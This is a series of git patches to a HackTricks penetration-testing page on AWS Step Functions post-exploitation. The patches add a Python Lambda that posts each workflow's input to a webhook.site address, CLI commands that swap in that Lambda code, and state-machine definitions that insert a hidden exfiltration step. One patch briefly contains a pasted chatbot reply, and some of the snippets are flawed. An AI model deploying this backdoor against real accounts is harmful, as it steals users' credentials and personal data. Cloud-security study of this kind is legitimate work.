From ce8947e87af616983bf2ad700a93389592e7d8db Mon Sep 17 00:00:00 2001 From: kluo84 <15222944+kluo84@users.noreply.github.com> Date: Mon, 24 Mar 2025 20:29:40 -0500 Subject: [PATCH 1/3] Update more post exploitation for step function --- .../aws-stepfunctions-post-exploitation.md | 63 +++++++++++++++++++ 1 file changed, 63 insertions(+) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 6a0cd5ba9e..8bbb6aa524 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -71,6 +71,69 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. +### `states:UpdateStateMachine` + +This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could: + +- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS). +- **Bypass security checks**, skip validation steps, or disable error handling. +- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution. + +This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control. + +```bash +aws stepfunctions update-state-machine \ + --state-machine-arn \ + --definition file://malicious_state_definition.json \ + --role-arn arn:aws:iam:::role/ +``` + +`malicious_state_definition.json` + +```json +{ + "Comment": "Malicious State Machine - Data Exfiltration", + "StartAt": "ExfiltrateSecrets", + "States": { + "ExfiltrateSecrets": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker", + "InputPath": "$", + "ResultPath": "$.exfiltration_result", + "Next": "LegitimateStep" + }, + "LegitimateStep": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic", + "End": true + } + } +} +``` +- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states. + +--- + +### `states:StartExecution` + +With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows: + +- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them. +- **Supplying attacker-controlled input** to abuse poorly validated states. +- **Recon of business logic** by probing execution responses or failures. + +Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities. + +```bash +aws stepfunctions start-execution \ + --state-machine-arn \ + --name "backdoor-$(date +%s)" \ + --input '{"command":"whoami"}' +``` + +- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge). + + {{#include ../../../banners/hacktricks-training.md}} From c6edb50a62cbc3a4dd937cbd2969056b14ba3a7a Mon Sep 17 00:00:00 2001 From: kluo84 <15222944+kluo84@users.noreply.github.com> Date: Wed, 26 Mar 2025 18:04:29 -0500 Subject: [PATCH 2/3] arte-mr.kluo-UpdateStateMachine --- .../aws-stepfunctions-post-exploitation.md | 138 +++++++++++++----- 1 file changed, 102 insertions(+), 36 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 8bbb6aa524..186043bb08 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -71,67 +71,133 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. -### `states:UpdateStateMachine` +Absolutely — here's your **PR-ready write-up** in the requested format, aligned with the `HackTricks` style you've been following. -This permission allows an attacker to **modify the logic of an existing state machine**. By injecting malicious logic into the state definition, the attacker could: +--- -- Add a **new state** that exfiltrates input/output to an external system (via Lambda or SNS). -- **Bypass security checks**, skip validation steps, or disable error handling. -- **Insert a logic bomb** that triggers under specific input conditions to disrupt execution. +### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode` -This attack can be subtle, blending into large state definitions, and may go unnoticed without strict ASL version control. +An attacker who compromises a user or role with the following permissions: + +```json +{ + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "AllowUpdateStateMachine", + "Effect": "Allow", + "Action": "states:UpdateStateMachine", + "Resource": "*" + }, + { + "Sid": "AllowUpdateFunctionCode", + "Effect": "Allow", + "Action": "lambda:UpdateFunctionCode", + "Resource": "*" + } + ] +} +``` + +...can conduct a **high-impact and stealthy post-exploitation attack** by combining Lambda backdooring with Step Function logic manipulation. + +This scenario assumes that the victim uses **AWS Step Functions to orchestrate workflows that process sensitive input**, such as credentials, tokens, or PII. + +Example victim invocation: ```bash -aws stepfunctions update-state-machine \ - --state-machine-arn \ - --definition file://malicious_state_definition.json \ - --role-arn arn:aws:iam:::role/ +aws stepfunctions start-execution \ + --state-machine-arn arn:aws:states:us-east-1::stateMachine:LegitStateMachine \ + --input '{"email": "victim@example.com", "password": "hunter2"}' --profile victim ``` -`malicious_state_definition.json` +If the Step Function is configured to invoke a Lambda like `LegitBusinessLogic`, the attacker can proceed with **two stealthy attack variants**: -```json +--- + +#### Updated the lambda function + +The attacker modifies the code of the Lambda function already used by the Step Function (`LegitBusinessLogic`) to silently exfiltrate input data. + +```python +# send_to_attacker.py +import requests + +def lambda_handler(event, context): + requests.post("https://webhook.site//exfil", json=event) + return {"status": "exfiltrated"} +``` + +```bash +zip function.zip send_to_attacker.py + +aws lambda update-function-code \ + --function-name LegitBusinessLogic \ + --zip-file fileb://function.zip -profile attacker +``` + +--- + +#### Add a Malicious State to the Step Function + +Alternatively, the attacker can inject an **exfiltration state** at the beginning of the workflow by updating the Step Function definition. + +```malicious_state_definition.json { - "Comment": "Malicious State Machine - Data Exfiltration", + "Comment": "Backdoored for Exfiltration", + "StartAt": "OriginalState", + "States": { + "OriginalState": { + "Type": "Task", + "Resource": "arn:aws:lambda:us-east-1::function:LegitBusinessLogic", + "End": true + } + } +} + +``` + +```bash +aws stepfunctions update-state-machine \ + --state-machine-arn arn:aws:states:us-east-1::stateMachine:LegitStateMachine \ + --definition file://malicious_state_definition.json --profile attacker +``` + +The attacker can even more stealthy to update the state definition to something like this +{ + "Comment": "Backdoored for Exfiltration", "StartAt": "ExfiltrateSecrets", "States": { "ExfiltrateSecrets": { "Type": "Task", - "Resource": "arn:aws:lambda:us-east-1:123456789012:function:SendToAttacker", + "Resource": "arn:aws:lambda:us-east-1:victim-id:function:SendToAttacker", "InputPath": "$", - "ResultPath": "$.exfiltration_result", - "Next": "LegitimateStep" + "ResultPath": "$.exfil", + "Next": "OriginalState" }, - "LegitimateStep": { + "OriginalState": { "Type": "Task", - "Resource": "arn:aws:lambda:us-east-1:123456789012:function:LegitBusinessLogic", + "Resource": "arn:aws:lambda:us-east-1:victim-id:function:LegitBusinessLogic", "End": true } - } + } } -``` -- **Potential Impact**: Data exfiltration, disruption of logic flow, persistent access through hidden states. + where the victim won't realize the different --- -### `states:StartExecution` +### Victim Setup (Context for Exploit) -With this permission, an attacker can **trigger executions on demand**, passing arbitrary input to state machines. This allows: +- A Step Function (`LegitStateMachine`) is used to process sensitive user input. +- It calls one or more Lambda functions such as `LegitBusinessLogic`. -- **Triggering sensitive operations** (e.g., Lambda invocations, EC2 actions) if the workflow handles them. -- **Supplying attacker-controlled input** to abuse poorly validated states. -- **Recon of business logic** by probing execution responses or failures. - -Used with `states:GetExecutionHistory`, it becomes a powerful tool for **logic discovery**, **abuse**, or **command execution** through embedded Lambdas or activities. - -```bash -aws stepfunctions start-execution \ - --state-machine-arn \ - --name "backdoor-$(date +%s)" \ - --input '{"command":"whoami"}' -``` +--- -- **Potential Impact**: Unauthorized triggering of sensitive workflows, business logic abuse, stealthy persistence (can be cron-triggered via EventBridge). +**Potential Impact**: +- Silent exfiltration of sensitive data including secrets, credentials, API keys, and PII. +- No visible errors or failures in workflow execution. +- Difficult to detect without auditing Lambda code or execution traces. +- Enables long-term persistence if backdoor remains in code or ASL logic. {{#include ../../../banners/hacktricks-training.md}} From 6ca3605cdae700c4fec0890a6b89c25755c78039 Mon Sep 17 00:00:00 2001 From: kluo <15222944+kluo84@users.noreply.github.com> Date: Wed, 26 Mar 2025 18:11:05 -0500 Subject: [PATCH 3/3] Update aws-stepfunctions-post-exploitation.md --- .../aws-stepfunctions-post-exploitation.md | 2 -- 1 file changed, 2 deletions(-) diff --git a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md index 186043bb08..2fcff0d2e2 100644 --- a/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md +++ b/src/pentesting-cloud/aws-security/aws-post-exploitation/aws-stepfunctions-post-exploitation.md @@ -71,8 +71,6 @@ aws stepfunctions untag-resource --resource-arn --tag-keys **Potential Impact**: Disruption of cost allocation, resource tracking, and tag-based access control policies. -Absolutely — here's your **PR-ready write-up** in the requested format, aligned with the `HackTricks` style you've been following. - --- ### `states:UpdateStateMachine`, `lambda:UpdateFunctionCode`